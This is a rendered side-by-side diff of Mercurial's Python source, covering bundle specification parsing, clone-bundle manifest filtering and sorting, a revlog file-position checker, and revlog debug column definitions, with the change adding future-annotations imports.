44 | 46 | new_lines = [] |
|
45 | 47 | for e in entries: |
|
46 | 48 | url = alter_bundle_url(repo, e[0]) |
|
47 | 49 | if len(e) == 1: |
|
48 | 50 | line = url + b'\n' |
|
49 | 51 | else: |
|
50 | 52 | line = b"%s %s\n" % (url, e[1]) |
|
51 | 53 | new_lines.append(line) |
|
52 | 54 | return b''.join(new_lines) |
|
53 | 55 | |
|
54 | 56 | |
|
55 | 57 | def alter_bundle_url(repo, url: bytes) -> bytes: |
|
56 | 58 | """a function that exist to help extension and hosting to alter the url |
|
57 | 59 | |
|
58 | 60 | This will typically be used to inject authentication information in the url |
|
59 | 61 | of cached bundles.""" |
|
60 | 62 | return url |
|
61 | 63 | |
|
62 | 64 | |
|
63 | 65 | SUPPORTED_CLONEBUNDLE_SCHEMES = [ |
|
64 | 66 | b"http://", |
|
65 | 67 | b"https://", |
|
66 | 68 | b"largefile://", |
|
67 | 69 | CLONEBUNDLESCHEME, |
|
68 | 70 | ] |
|
69 | 71 | |
|
70 | 72 | |
|
71 | 73 | @attr.s |
|
72 | 74 | class bundlespec: |
|
73 | 75 | compression = attr.ib() |
|
74 | 76 | wirecompression = attr.ib() |
|
75 | 77 | version = attr.ib() |
|
76 | 78 | wireversion = attr.ib() |
|
77 | 79 | # parameters explicitly overwritten by the config or the specification |
|
78 | 80 | _explicit_params = attr.ib() |
|
79 | 81 | # default parameter for the version |
|
80 | 82 | # |
|
81 | 83 | # Keeping it separated is useful to check what was actually overwritten. |
|
82 | 84 | _default_opts = attr.ib() |
|
83 | 85 | |
|
84 | 86 | @property |
|
85 | 87 | def params(self): |
|
86 | 88 | return collections.ChainMap(self._explicit_params, self._default_opts) |
|
87 | 89 | |
|
88 | 90 | @property |
|
89 | 91 | def contentopts(self): |
|
90 | 92 | # kept for Backward Compatibility concerns. |
|
91 | 93 | return self.params |
|
92 | 94 | |
|
93 | 95 | def set_param(self, key, value, overwrite=True): |
|
94 | 96 | """Set a bundle parameter value. |
|
95 | 97 | |
|
96 | 98 | Will only overwrite if overwrite is true""" |
|
97 | 99 | if overwrite or key not in self._explicit_params: |
|
98 | 100 | self._explicit_params[key] = value |
|
99 | 101 | |
|
100 | 102 | def as_spec(self): |
|
101 | 103 | parts = [b"%s-%s" % (self.compression, self.version)] |
|
102 | 104 | for param in sorted(self._explicit_params.items()): |
|
103 | 105 | parts.append(b'%s=%s' % param) |
|
104 | 106 | return b';'.join(parts) |
|
105 | 107 | |
|
106 | 108 | |
|
107 | 109 | # Maps bundle version human names to changegroup versions. |
|
108 | 110 | _bundlespeccgversions = { |
|
109 | 111 | b'v1': b'01', |
|
110 | 112 | b'v2': b'02', |
|
111 | 113 | b'v3': b'03', |
|
112 | 114 | b'packed1': b's1', |
|
113 | 115 | b'bundle2': b'02', # legacy |
|
114 | 116 | } |
|
115 | 117 | |
|
116 | 118 | # Maps bundle version with content opts to choose which part to bundle |
|
117 | 119 | _bundlespeccontentopts: Dict[bytes, Dict[bytes, Union[bool, bytes]]] = { |
|
118 | 120 | b'v1': { |
|
119 | 121 | b'changegroup': True, |
|
120 | 122 | b'cg.version': b'01', |
|
121 | 123 | b'obsolescence': False, |
|
122 | 124 | b'phases': False, |
|
123 | 125 | b'tagsfnodescache': False, |
|
124 | 126 | b'revbranchcache': False, |
|
125 | 127 | }, |
|
126 | 128 | b'v2': { |
|
127 | 129 | b'changegroup': True, |
|
128 | 130 | b'cg.version': b'02', |
|
129 | 131 | b'obsolescence': False, |
|
130 | 132 | b'phases': False, |
|
131 | 133 | b'tagsfnodescache': True, |
|
132 | 134 | b'revbranchcache': True, |
|
133 | 135 | }, |
|
134 | 136 | b'v3': { |
|
135 | 137 | b'changegroup': True, |
|
136 | 138 | b'cg.version': b'03', |
|
137 | 139 | b'obsolescence': False, |
|
138 | 140 | b'phases': True, |
|
139 | 141 | b'tagsfnodescache': True, |
|
140 | 142 | b'revbranchcache': True, |
|
141 | 143 | }, |
|
142 | 144 | b'streamv2': { |
|
143 | 145 | b'changegroup': False, |
|
144 | 146 | b'cg.version': b'02', |
|
145 | 147 | b'obsolescence': False, |
|
146 | 148 | b'phases': False, |
|
147 | 149 | b"stream": b"v2", |
|
148 | 150 | b'tagsfnodescache': False, |
|
149 | 151 | b'revbranchcache': False, |
|
150 | 152 | }, |
|
151 | 153 | b'streamv3-exp': { |
|
152 | 154 | b'changegroup': False, |
|
153 | 155 | b'cg.version': b'03', |
|
154 | 156 | b'obsolescence': False, |
|
155 | 157 | b'phases': False, |
|
156 | 158 | b"stream": b"v3-exp", |
|
157 | 159 | b'tagsfnodescache': False, |
|
158 | 160 | b'revbranchcache': False, |
|
159 | 161 | }, |
|
160 | 162 | b'packed1': { |
|
161 | 163 | b'cg.version': b's1', |
|
162 | 164 | }, |
|
163 | 165 | b'bundle2': { # legacy |
|
164 | 166 | b'cg.version': b'02', |
|
165 | 167 | }, |
|
166 | 168 | } |
|
167 | 169 | _bundlespeccontentopts[b'bundle2'] = _bundlespeccontentopts[b'v2'] |
|
168 | 170 | |
|
169 | 171 | # Compression engines allowed in version 1. THIS SHOULD NEVER CHANGE. |
|
170 | 172 | _bundlespecv1compengines = {b'gzip', b'bzip2', b'none'} |
|
171 | 173 | |
|
172 | 174 | |
|
173 | 175 | def param_bool(key, value): |
|
174 | 176 | """make a boolean out of a parameter value""" |
|
175 | 177 | b = stringutil.parsebool(value) |
|
176 | 178 | if b is None: |
|
177 | 179 | msg = _(b"parameter %s should be a boolean ('%s')") |
|
178 | 180 | msg %= (key, value) |
|
179 | 181 | raise error.InvalidBundleSpecification(msg) |
|
180 | 182 | return b |
|
181 | 183 | |
|
182 | 184 | |
|
183 | 185 | # mapping of known parameter name need their value processed |
|
184 | 186 | bundle_spec_param_processing = { |
|
185 | 187 | b"obsolescence": param_bool, |
|
186 | 188 | b"obsolescence-mandatory": param_bool, |
|
187 | 189 | b"phases": param_bool, |
|
188 | 190 | b"changegroup": param_bool, |
|
189 | 191 | b"tagsfnodescache": param_bool, |
|
190 | 192 | b"revbranchcache": param_bool, |
|
191 | 193 | } |
|
192 | 194 | |
|
193 | 195 | |
|
194 | 196 | def _parseparams(s): |
|
195 | 197 | """parse bundlespec parameter section |
|
196 | 198 | |
|
197 | 199 | input: "comp-version;params" string |
|
198 | 200 | |
|
199 | 201 | return: (spec; {param_key: param_value}) |
|
200 | 202 | """ |
|
201 | 203 | if b';' not in s: |
|
202 | 204 | return s, {} |
|
203 | 205 | |
|
204 | 206 | params = {} |
|
205 | 207 | version, paramstr = s.split(b';', 1) |
|
206 | 208 | |
|
207 | 209 | err = _(b'invalid bundle specification: missing "=" in parameter: %s') |
|
208 | 210 | for p in paramstr.split(b';'): |
|
209 | 211 | if b'=' not in p: |
|
210 | 212 | msg = err % p |
|
211 | 213 | raise error.InvalidBundleSpecification(msg) |
|
212 | 214 | |
|
213 | 215 | key, value = p.split(b'=', 1) |
|
214 | 216 | key = urlreq.unquote(key) |
|
215 | 217 | value = urlreq.unquote(value) |
|
216 | 218 | process = bundle_spec_param_processing.get(key) |
|
217 | 219 | if process is not None: |
|
218 | 220 | value = process(key, value) |
|
219 | 221 | params[key] = value |
|
220 | 222 | |
|
221 | 223 | return version, params |
|
222 | 224 | |
|
223 | 225 | |
|
224 | 226 | def parsebundlespec(repo, spec, strict=True): |
|
225 | 227 | """Parse a bundle string specification into parts. |
|
226 | 228 | |
|
227 | 229 | Bundle specifications denote a well-defined bundle/exchange format. |
|
228 | 230 | The content of a given specification should not change over time in |
|
229 | 231 | order to ensure that bundles produced by a newer version of Mercurial are |
|
230 | 232 | readable from an older version. |
|
231 | 233 | |
|
232 | 234 | The string currently has the form: |
|
233 | 235 | |
|
234 | 236 | <compression>-<type>[;<parameter0>[;<parameter1>]] |
|
235 | 237 | |
|
236 | 238 | Where <compression> is one of the supported compression formats |
|
237 | 239 | and <type> is (currently) a version string. A ";" can follow the type and |
|
238 | 240 | all text afterwards is interpreted as URI encoded, ";" delimited key=value |
|
239 | 241 | pairs. |
|
240 | 242 | |
|
241 | 243 | If ``strict`` is True (the default) <compression> is required. Otherwise, |
|
242 | 244 | it is optional. |
|
243 | 245 | |
|
244 | 246 | Returns a bundlespec object of (compression, version, parameters). |
|
245 | 247 | Compression will be ``None`` if not in strict mode and a compression isn't |
|
246 | 248 | defined. |
|
247 | 249 | |
|
248 | 250 | An ``InvalidBundleSpecification`` is raised when the specification is |
|
249 | 251 | not syntactically well formed. |
|
250 | 252 | |
|
251 | 253 | An ``UnsupportedBundleSpecification`` is raised when the compression or |
|
252 | 254 | bundle type/version is not recognized. |
|
253 | 255 | |
|
254 | 256 | Note: this function will likely eventually return a more complex data |
|
255 | 257 | structure, including bundle2 part information. |
|
256 | 258 | """ |
|
257 | 259 | if strict and b'-' not in spec: |
|
258 | 260 | raise error.InvalidBundleSpecification( |
|
259 | 261 | _( |
|
260 | 262 | b'invalid bundle specification; ' |
|
261 | 263 | b'must be prefixed with compression: %s' |
|
262 | 264 | ) |
|
263 | 265 | % spec |
|
264 | 266 | ) |
|
265 | 267 | |
|
266 | 268 | pre_args = spec.split(b';', 1)[0] |
|
267 | 269 | if b'-' in pre_args: |
|
268 | 270 | compression, version = spec.split(b'-', 1) |
|
269 | 271 | |
|
270 | 272 | if compression not in util.compengines.supportedbundlenames: |
|
271 | 273 | raise error.UnsupportedBundleSpecification( |
|
272 | 274 | _(b'%s compression is not supported') % compression |
|
273 | 275 | ) |
|
274 | 276 | |
|
275 | 277 | version, params = _parseparams(version) |
|
276 | 278 | |
|
277 | 279 | if version not in _bundlespeccontentopts: |
|
278 | 280 | raise error.UnsupportedBundleSpecification( |
|
279 | 281 | _(b'%s is not a recognized bundle version') % version |
|
280 | 282 | ) |
|
281 | 283 | else: |
|
282 | 284 | # Value could be just the compression or just the version, in which |
|
283 | 285 | # case some defaults are assumed (but only when not in strict mode). |
|
284 | 286 | assert not strict |
|
285 | 287 | |
|
286 | 288 | spec, params = _parseparams(spec) |
|
287 | 289 | |
|
288 | 290 | if spec in util.compengines.supportedbundlenames: |
|
289 | 291 | compression = spec |
|
290 | 292 | version = b'v1' |
|
291 | 293 | # Generaldelta repos require v2. |
|
292 | 294 | if requirementsmod.GENERALDELTA_REQUIREMENT in repo.requirements: |
|
293 | 295 | version = b'v2' |
|
294 | 296 | elif requirementsmod.REVLOGV2_REQUIREMENT in repo.requirements: |
|
295 | 297 | version = b'v2' |
|
296 | 298 | # Modern compression engines require v2. |
|
297 | 299 | if compression not in _bundlespecv1compengines: |
|
298 | 300 | version = b'v2' |
|
299 | 301 | elif spec in _bundlespeccontentopts: |
|
300 | 302 | if spec == b'packed1': |
|
301 | 303 | compression = b'none' |
|
302 | 304 | else: |
|
303 | 305 | compression = b'bzip2' |
|
304 | 306 | version = spec |
|
305 | 307 | else: |
|
306 | 308 | raise error.UnsupportedBundleSpecification( |
|
307 | 309 | _(b'%s is not a recognized bundle specification') % spec |
|
308 | 310 | ) |
|
309 | 311 | |
|
310 | 312 | # Bundle version 1 only supports a known set of compression engines. |
|
311 | 313 | if version == b'v1' and compression not in _bundlespecv1compengines: |
|
312 | 314 | raise error.UnsupportedBundleSpecification( |
|
313 | 315 | _(b'compression engine %s is not supported on v1 bundles') |
|
314 | 316 | % compression |
|
315 | 317 | ) |
|
316 | 318 | |
|
317 | 319 | # The specification for packed1 can optionally declare the data formats |
|
318 | 320 | # required to apply it. If we see this metadata, compare against what the |
|
319 | 321 | # repo supports and error if the bundle isn't compatible. |
|
320 | 322 | if version == b'packed1' and b'requirements' in params: |
|
321 | 323 | requirements = set(cast(bytes, params[b'requirements']).split(b',')) |
|
322 | 324 | missingreqs = requirements - requirementsmod.STREAM_FIXED_REQUIREMENTS |
|
323 | 325 | if missingreqs: |
|
324 | 326 | raise error.UnsupportedBundleSpecification( |
|
325 | 327 | _(b'missing support for repository features: %s') |
|
326 | 328 | % b', '.join(sorted(missingreqs)) |
|
327 | 329 | ) |
|
328 | 330 | |
|
329 | 331 | # Compute contentopts based on the version |
|
330 | 332 | if b"stream" in params: |
|
331 | 333 | # This case is fishy as this mostly derails the version selection |
|
332 | 334 | # mechanism. `stream` bundles are quite specific and used differently |
|
333 | 335 | # as "normal" bundles. |
|
334 | 336 | # |
|
335 | 337 | # (we should probably define a cleaner way to do this and raise a |
|
336 | 338 | # warning when the old way is encountered) |
|
337 | 339 | if params[b"stream"] == b"v2": |
|
338 | 340 | version = b"streamv2" |
|
339 | 341 | if params[b"stream"] == b"v3-exp": |
|
340 | 342 | version = b"streamv3-exp" |
|
341 | 343 | contentopts = _bundlespeccontentopts.get(version, {}).copy() |
|
342 | 344 | if version == b"streamv2" or version == b"streamv3-exp": |
|
343 | 345 | # streamv2 have been reported as "v2" for a while. |
|
344 | 346 | version = b"v2" |
|
345 | 347 | |
|
346 | 348 | engine = util.compengines.forbundlename(compression) |
|
347 | 349 | compression, wirecompression = engine.bundletype() |
|
348 | 350 | wireversion = _bundlespeccontentopts[version][b'cg.version'] |
|
349 | 351 | |
|
350 | 352 | return bundlespec( |
|
351 | 353 | compression, wirecompression, version, wireversion, params, contentopts |
|
352 | 354 | ) |
|
353 | 355 | |
|
354 | 356 | |
|
355 | 357 | def parseclonebundlesmanifest(repo, s): |
|
356 | 358 | """Parses the raw text of a clone bundles manifest. |
|
357 | 359 | |
|
358 | 360 | Returns a list of dicts. The dicts have a ``URL`` key corresponding |
|
359 | 361 | to the URL and other keys are the attributes for the entry. |
|
360 | 362 | """ |
|
361 | 363 | m = [] |
|
362 | 364 | for line in s.splitlines(): |
|
363 | 365 | fields = line.split() |
|
364 | 366 | if not fields: |
|
365 | 367 | continue |
|
366 | 368 | attrs = {b'URL': fields[0]} |
|
367 | 369 | for rawattr in fields[1:]: |
|
368 | 370 | key, value = rawattr.split(b'=', 1) |
|
369 | 371 | key = util.urlreq.unquote(key) |
|
370 | 372 | value = util.urlreq.unquote(value) |
|
371 | 373 | attrs[key] = value |
|
372 | 374 | |
|
373 | 375 | # Parse BUNDLESPEC into components. This makes client-side |
|
374 | 376 | # preferences easier to specify since you can prefer a single |
|
375 | 377 | # component of the BUNDLESPEC. |
|
376 | 378 | if key == b'BUNDLESPEC': |
|
377 | 379 | try: |
|
378 | 380 | bundlespec = parsebundlespec(repo, value) |
|
379 | 381 | attrs[b'COMPRESSION'] = bundlespec.compression |
|
380 | 382 | attrs[b'VERSION'] = bundlespec.version |
|
381 | 383 | except error.InvalidBundleSpecification: |
|
382 | 384 | pass |
|
383 | 385 | except error.UnsupportedBundleSpecification: |
|
384 | 386 | pass |
|
385 | 387 | |
|
386 | 388 | m.append(attrs) |
|
387 | 389 | |
|
388 | 390 | return m |
|
389 | 391 | |
|
390 | 392 | |
|
391 | 393 | def isstreamclonespec(bundlespec): |
|
392 | 394 | # Stream clone v1 |
|
393 | 395 | if bundlespec.wirecompression == b'UN' and bundlespec.wireversion == b's1': |
|
394 | 396 | return True |
|
395 | 397 | |
|
396 | 398 | # Stream clone v2 |
|
397 | 399 | if ( |
|
398 | 400 | bundlespec.wirecompression == b'UN' |
|
399 | 401 | and bundlespec.wireversion == b'02' |
|
400 | 402 | and bundlespec.contentopts.get(b'stream', None) in (b"v2", b"v3-exp") |
|
401 | 403 | ): |
|
402 | 404 | return True |
|
403 | 405 | |
|
404 | 406 | return False |
|
405 | 407 | |
|
406 | 408 | |
|
407 | 409 | def filterclonebundleentries( |
|
408 | 410 | repo, entries, streamclonerequested=False, pullbundles=False |
|
409 | 411 | ): |
|
410 | 412 | """Remove incompatible clone bundle manifest entries. |
|
411 | 413 | |
|
412 | 414 | Accepts a list of entries parsed with ``parseclonebundlesmanifest`` |
|
413 | 415 | and returns a new list consisting of only the entries that this client |
|
414 | 416 | should be able to apply. |
|
415 | 417 | |
|
416 | 418 | There is no guarantee we'll be able to apply all returned entries because |
|
417 | 419 | the metadata we use to filter on may be missing or wrong. |
|
418 | 420 | """ |
|
419 | 421 | newentries = [] |
|
420 | 422 | for entry in entries: |
|
421 | 423 | url = entry.get(b'URL') |
|
422 | 424 | if not pullbundles and not any( |
|
423 | 425 | [url.startswith(scheme) for scheme in SUPPORTED_CLONEBUNDLE_SCHEMES] |
|
424 | 426 | ): |
|
425 | 427 | repo.ui.debug( |
|
426 | 428 | b'filtering %s because not a supported clonebundle scheme\n' |
|
427 | 429 | % url |
|
428 | 430 | ) |
|
429 | 431 | continue |
|
430 | 432 | |
|
431 | 433 | spec = entry.get(b'BUNDLESPEC') |
|
432 | 434 | if spec: |
|
433 | 435 | try: |
|
434 | 436 | bundlespec = parsebundlespec(repo, spec, strict=True) |
|
435 | 437 | |
|
436 | 438 | # If a stream clone was requested, filter out non-streamclone |
|
437 | 439 | # entries. |
|
438 | 440 | if streamclonerequested and not isstreamclonespec(bundlespec): |
|
439 | 441 | repo.ui.debug( |
|
440 | 442 | b'filtering %s because not a stream clone\n' % url |
|
441 | 443 | ) |
|
442 | 444 | continue |
|
443 | 445 | |
|
444 | 446 | except error.InvalidBundleSpecification as e: |
|
445 | 447 | repo.ui.debug(stringutil.forcebytestr(e) + b'\n') |
|
446 | 448 | continue |
|
447 | 449 | except error.UnsupportedBundleSpecification as e: |
|
448 | 450 | repo.ui.debug( |
|
449 | 451 | b'filtering %s because unsupported bundle ' |
|
450 | 452 | b'spec: %s\n' % (url, stringutil.forcebytestr(e)) |
|
451 | 453 | ) |
|
452 | 454 | continue |
|
453 | 455 | # If we don't have a spec and requested a stream clone, we don't know |
|
454 | 456 | # what the entry is so don't attempt to apply it. |
|
455 | 457 | elif streamclonerequested: |
|
456 | 458 | repo.ui.debug( |
|
457 | 459 | b'filtering %s because cannot determine if a stream ' |
|
458 | 460 | b'clone bundle\n' % url |
|
459 | 461 | ) |
|
460 | 462 | continue |
|
461 | 463 | |
|
462 | 464 | if b'REQUIRESNI' in entry and not sslutil.hassni: |
|
463 | 465 | repo.ui.debug(b'filtering %s because SNI not supported\n' % url) |
|
464 | 466 | continue |
|
465 | 467 | |
|
466 | 468 | if b'REQUIREDRAM' in entry: |
|
467 | 469 | try: |
|
468 | 470 | requiredram = util.sizetoint(entry[b'REQUIREDRAM']) |
|
469 | 471 | except error.ParseError: |
|
470 | 472 | repo.ui.debug( |
|
471 | 473 | b'filtering %s due to a bad REQUIREDRAM attribute\n' % url |
|
472 | 474 | ) |
|
473 | 475 | continue |
|
474 | 476 | actualram = repo.ui.estimatememory() |
|
475 | 477 | if actualram is not None and actualram * 0.66 < requiredram: |
|
476 | 478 | repo.ui.debug( |
|
477 | 479 | b'filtering %s as it needs more than 2/3 of system memory\n' |
|
478 | 480 | % url |
|
479 | 481 | ) |
|
480 | 482 | continue |
|
481 | 483 | |
|
482 | 484 | newentries.append(entry) |
|
483 | 485 | |
|
484 | 486 | return newentries |
|
485 | 487 | |
|
486 | 488 | |
|
487 | 489 | class clonebundleentry: |
|
488 | 490 | """Represents an item in a clone bundles manifest. |
|
489 | 491 | |
|
490 | 492 | This rich class is needed to support sorting since sorted() in Python 3 |
|
491 | 493 | doesn't support ``cmp`` and our comparison is complex enough that ``key=`` |
|
492 | 494 | won't work. |
|
493 | 495 | """ |
|
494 | 496 | |
|
495 | 497 | def __init__(self, value, prefers): |
|
496 | 498 | self.value = value |
|
497 | 499 | self.prefers = prefers |
|
498 | 500 | |
|
499 | 501 | def _cmp(self, other): |
|
500 | 502 | for prefkey, prefvalue in self.prefers: |
|
501 | 503 | avalue = self.value.get(prefkey) |
|
502 | 504 | bvalue = other.value.get(prefkey) |
|
503 | 505 | |
|
504 | 506 | # Special case for b missing attribute and a matches exactly. |
|
505 | 507 | if avalue is not None and bvalue is None and avalue == prefvalue: |
|
506 | 508 | return -1 |
|
507 | 509 | |
|
508 | 510 | # Special case for a missing attribute and b matches exactly. |
|
509 | 511 | if bvalue is not None and avalue is None and bvalue == prefvalue: |
|
510 | 512 | return 1 |
|
511 | 513 | |
|
512 | 514 | # We can't compare unless attribute present on both. |
|
513 | 515 | if avalue is None or bvalue is None: |
|
514 | 516 | continue |
|
515 | 517 | |
|
516 | 518 | # Same values should fall back to next attribute. |
|
517 | 519 | if avalue == bvalue: |
|
518 | 520 | continue |
|
519 | 521 | |
|
520 | 522 | # Exact matches come first. |
|
521 | 523 | if avalue == prefvalue: |
|
522 | 524 | return -1 |
|
523 | 525 | if bvalue == prefvalue: |
|
524 | 526 | return 1 |
|
525 | 527 | |
|
526 | 528 | # Fall back to next attribute. |
|
527 | 529 | continue |
|
528 | 530 | |
|
529 | 531 | # If we got here we couldn't sort by attributes and prefers. Fall |
|
530 | 532 | # back to index order. |
|
531 | 533 | return 0 |
|
532 | 534 | |
|
533 | 535 | def __lt__(self, other): |
|
534 | 536 | return self._cmp(other) < 0 |
|
535 | 537 | |
|
536 | 538 | def __gt__(self, other): |
|
537 | 539 | return self._cmp(other) > 0 |
|
538 | 540 | |
|
539 | 541 | def __eq__(self, other): |
|
540 | 542 | return self._cmp(other) == 0 |
|
541 | 543 | |
|
542 | 544 | def __le__(self, other): |
|
543 | 545 | return self._cmp(other) <= 0 |
|
544 | 546 | |
|
545 | 547 | def __ge__(self, other): |
|
546 | 548 | return self._cmp(other) >= 0 |
|
547 | 549 | |
|
548 | 550 | def __ne__(self, other): |
|
549 | 551 | return self._cmp(other) != 0 |
|
550 | 552 | |
|
551 | 553 | |
|
552 | 554 | def sortclonebundleentries(ui, entries): |
|
553 | 555 | prefers = ui.configlist(b'ui', b'clonebundleprefers') |
|
554 | 556 | if not prefers: |
|
555 | 557 | return list(entries) |
|
556 | 558 | |
|
557 | 559 | def _split(p): |
|
558 | 560 | if b'=' not in p: |
|
559 | 561 | hint = _(b"each comma separated item should be key=value pairs") |
|
560 | 562 | raise error.Abort( |
|
561 | 563 | _(b"invalid ui.clonebundleprefers item: %s") % p, hint=hint |
|
562 | 564 | ) |
|
563 | 565 | return p.split(b'=', 1) |
|
564 | 566 | |
|
565 | 567 | prefers = [_split(p) for p in prefers] |
|
566 | 568 | |
|
567 | 569 | items = sorted(clonebundleentry(v, prefers) for v in entries) |
|
568 | 570 | return [i.value for i in items] |
@@ -1,38 +1,40 | |||
|
1 | from __future__ import annotations | |
|
2 | ||
|
1 | 3 | from ..i18n import _ |
|
2 | 4 | from .. import error |
|
3 | 5 | |
|
4 | 6 | |
|
5 | 7 | def get_checker(ui, revlog_name=b'changelog'): |
|
6 | 8 | """Get a function that checks file handle position is as expected. |
|
7 | 9 | |
|
8 | 10 | This is used to ensure that files haven't been modified outside of our |
|
9 | 11 | knowledge (such as on a networked filesystem, if `hg debuglocks` was used, |
|
10 | 12 | or writes to .hg that ignored locks happened). |
|
11 | 13 | |
|
12 | 14 | Due to revlogs supporting a concept of buffered, delayed, or diverted |
|
13 | 15 | writes, we're allowing the files to be shorter than expected (the data may |
|
14 | 16 | not have been written yet), but they can't be longer. |
|
15 | 17 | |
|
16 | 18 | Please note that this check is not perfect; it can't detect all cases (there |
|
17 | 19 | may be false-negatives/false-OKs), but it should never claim there's an |
|
18 | 20 | issue when there isn't (false-positives/false-failures). |
|
19 | 21 | """ |
|
20 | 22 | |
|
21 | 23 | vpos = ui.config(b'debug', b'revlog.verifyposition.' + revlog_name) |
|
22 | 24 | # Avoid any `fh.tell` cost if this isn't enabled. |
|
23 | 25 | if not vpos or vpos not in [b'log', b'warn', b'fail']: |
|
24 | 26 | return None |
|
25 | 27 | |
|
26 | 28 | def _checker(fh, fn, expected): |
|
27 | 29 | if fh.tell() <= expected: |
|
28 | 30 | return |
|
29 | 31 | |
|
30 | 32 | msg = _(b'%s: file cursor at position %d, expected %d') |
|
31 | 33 | # Always log if we're going to warn or fail. |
|
32 | 34 | ui.log(b'debug', msg + b'\n', fn, fh.tell(), expected) |
|
33 | 35 | if vpos == b'warn': |
|
34 | 36 | ui.warn((msg + b'\n') % (fn, fh.tell(), expected)) |
|
35 | 37 | elif vpos == b'fail': |
|
36 | 38 | raise error.RevlogError(msg % (fn, fh.tell(), expected)) |
|
37 | 39 | |
|
38 | 40 | return _checker |
@@ -1,943 +1,945 | |||
|
1 | 1 | # revlogutils/debug.py - utility used for revlog debuging |
|
2 | 2 | # |
|
3 | 3 | # Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> |
|
4 | 4 | # Copyright 2022 Octobus <contact@octobus.net> |
|
5 | 5 | # |
|
6 | 6 | # This software may be used and distributed according to the terms of the |
|
7 | 7 | # GNU General Public License version 2 or any later version. |
|
8 | 8 | |
|
9 | from __future__ import annotations | |
|
10 | ||
|
9 | 11 | import collections |
|
10 | 12 | import string |
|
11 | 13 | |
|
12 | 14 | from .. import ( |
|
13 | 15 | mdiff, |
|
14 | 16 | node as nodemod, |
|
15 | 17 | revlogutils, |
|
16 | 18 | ) |
|
17 | 19 | |
|
18 | 20 | from . import ( |
|
19 | 21 | constants, |
|
20 | 22 | deltas as deltautil, |
|
21 | 23 | ) |
|
22 | 24 | |
|
23 | 25 | INDEX_ENTRY_DEBUG_COLUMN = [] |
|
24 | 26 | |
|
25 | 27 | NODE_SIZE = object() |
|
26 | 28 | |
|
27 | 29 | |
|
28 | 30 | class _column_base: |
|
29 | 31 | """constains the definition of a revlog column |
|
30 | 32 | |
|
31 | 33 | name: the column header, |
|
32 | 34 | value_func: the function called to get a value, |
|
33 | 35 | size: the width of the column, |
|
34 | 36 | verbose_only: only include the column in verbose mode. |
|
35 | 37 | """ |
|
36 | 38 | |
|
37 | 39 | def __init__(self, name, value_func, size=None, verbose=False): |
|
38 | 40 | self.name = name |
|
39 | 41 | self.value_func = value_func |
|
40 | 42 | if size is not NODE_SIZE: |
|
41 | 43 | if size is None: |
|
42 | 44 | size = 8 # arbitrary default |
|
43 | 45 | size = max(len(name), size) |
|
44 | 46 | self._size = size |
|
45 | 47 | self.verbose_only = verbose |
|
46 | 48 | |
|
47 | 49 | def get_size(self, node_size): |
|
48 | 50 | if self._size is NODE_SIZE: |
|
49 | 51 | return node_size |
|
50 | 52 | else: |
|
51 | 53 | return self._size |
|
52 | 54 | |
|
53 | 55 | |
|
54 | 56 | def debug_column(name, size=None, verbose=False): |
|
55 | 57 | """decorated function is registered as a column |
|
56 | 58 | |
|
57 | 59 | name: the name of the column, |
|
58 | 60 | size: the expected size of the column. |
|
59 | 61 | """ |
|
60 | 62 | |
|
61 | 63 | def register(func): |
|
62 | 64 | entry = _column_base( |
|
63 | 65 | name=name, |
|
64 | 66 | value_func=func, |
|
65 | 67 | size=size, |
|
66 | 68 | verbose=verbose, |
|
67 | 69 | ) |
|
68 | 70 | INDEX_ENTRY_DEBUG_COLUMN.append(entry) |
|
69 | 71 | return entry |
|
70 | 72 | |
|
71 | 73 | return register |
|
72 | 74 | |
|
73 | 75 | |
|
74 | 76 | @debug_column(b"rev", size=6) |
|
75 | 77 | def _rev(index, rev, entry, hexfn): |
|
76 | 78 | return b"%d" % rev |
|
77 | 79 | |
|
78 | 80 | |
|
79 | 81 | @debug_column(b"rank", size=6, verbose=True) |
|
80 | 82 | def rank(index, rev, entry, hexfn): |
|
81 | 83 | return b"%d" % entry[constants.ENTRY_RANK] |
|
82 | 84 | |
|
83 | 85 | |
|
84 | 86 | @debug_column(b"linkrev", size=6) |
|
85 | 87 | def _linkrev(index, rev, entry, hexfn): |
|
86 | 88 | return b"%d" % entry[constants.ENTRY_LINK_REV] |
|
87 | 89 | |
|
88 | 90 | |
|
89 | 91 | @debug_column(b"nodeid", size=NODE_SIZE) |
|
90 | 92 | def _nodeid(index, rev, entry, hexfn): |
|
91 | 93 | return hexfn(entry[constants.ENTRY_NODE_ID]) |
|
92 | 94 | |
|
93 | 95 | |
|
94 | 96 | @debug_column(b"p1-rev", size=6, verbose=True) |
|
95 | 97 | def _p1_rev(index, rev, entry, hexfn): |
|
96 | 98 | return b"%d" % entry[constants.ENTRY_PARENT_1] |
|
97 | 99 | |
|
98 | 100 | |
|
99 | 101 | @debug_column(b"p1-nodeid", size=NODE_SIZE) |
|
100 | 102 | def _p1_node(index, rev, entry, hexfn): |
|
101 | 103 | parent = entry[constants.ENTRY_PARENT_1] |
|
102 | 104 | p_entry = index[parent] |
|
103 | 105 | return hexfn(p_entry[constants.ENTRY_NODE_ID]) |
|
104 | 106 | |
|
105 | 107 | |
|
106 | 108 | @debug_column(b"p2-rev", size=6, verbose=True) |
|
107 | 109 | def _p2_rev(index, rev, entry, hexfn): |
|
108 | 110 | return b"%d" % entry[constants.ENTRY_PARENT_2] |
|
109 | 111 | |
|
110 | 112 | |
|
111 | 113 | @debug_column(b"p2-nodeid", size=NODE_SIZE) |
|
112 | 114 | def _p2_node(index, rev, entry, hexfn): |
|
113 | 115 | parent = entry[constants.ENTRY_PARENT_2] |
|
114 | 116 | p_entry = index[parent] |
|
115 | 117 | return hexfn(p_entry[constants.ENTRY_NODE_ID]) |
|
116 | 118 | |
|
117 | 119 | |
|
118 | 120 | @debug_column(b"full-size", size=20, verbose=True) |
|
119 | 121 | def full_size(index, rev, entry, hexfn): |
|
120 | 122 | return b"%d" % entry[constants.ENTRY_DATA_UNCOMPRESSED_LENGTH] |
|
121 | 123 | |
|
122 | 124 | |
|
123 | 125 | @debug_column(b"delta-base", size=6, verbose=True) |
|
124 | 126 | def delta_base(index, rev, entry, hexfn): |
|
125 | 127 | return b"%d" % entry[constants.ENTRY_DELTA_BASE] |
|
126 | 128 | |
|
127 | 129 | |
|
128 | 130 | @debug_column(b"flags", size=2, verbose=True) |
|
129 | 131 | def flags(index, rev, entry, hexfn): |
|
130 | 132 | field = entry[constants.ENTRY_DATA_OFFSET] |
|
131 | 133 | field &= 0xFFFF |
|
132 | 134 | return b"%d" % field |
|
133 | 135 | |
|
134 | 136 | |
|
